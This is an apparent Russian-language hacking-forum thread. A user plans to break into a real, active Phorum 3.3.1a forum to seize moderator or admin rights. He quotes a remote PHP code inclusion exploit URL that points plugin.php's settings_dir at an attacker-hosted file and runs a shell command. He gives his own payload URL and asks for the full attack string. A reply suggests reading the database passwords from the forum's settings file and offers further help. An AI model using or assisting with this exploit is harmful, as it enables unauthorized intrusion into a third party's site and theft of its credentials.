Старенький Phorum 3.3.1а
 

фоумок нашел.на секлабе к нему есть пара сплоитов

один из них(по идее должен работать и на 3,3,1)
Phorum 3.3.2a (http://www.phorum.org)
(http://www.pomorsu.ru/doc/opennet/op...3_222.txt.html)
внедрение произвольного PHP кода в plugin.php. Пример:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= http://[evilhost]&cmd=ls

создал: http://ftpserver1.narod.ru/replace.php
вопрос: как будет выглядеть полностью строчка

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://ftpserver1.narod.ru/replace.php&cmd=ls
гм.. что писать в setting dir?.

случняком напоролся при узучении, возможно мне поможет(где лежит форум...)
/home/forumgames/
--------------
если через эту уязвимость не проникну, тогда что посоветуете?
п..с все, что надо - получить права модера, т..к на одном нашем форуме модера и админа просто нет(трудно в это поверить..). форум активный очень, но засранный.но что б получить права модера, нужны скорее всего будут права админа.

Если я не ошибаюсь то в этом форуме пароли к бд хранятся в \admin\settings в файле forums.php это также файл настройки вот и подумай что можно написать

А ещё лучше дай мне ссылку на форум по Icq постараемся разобраться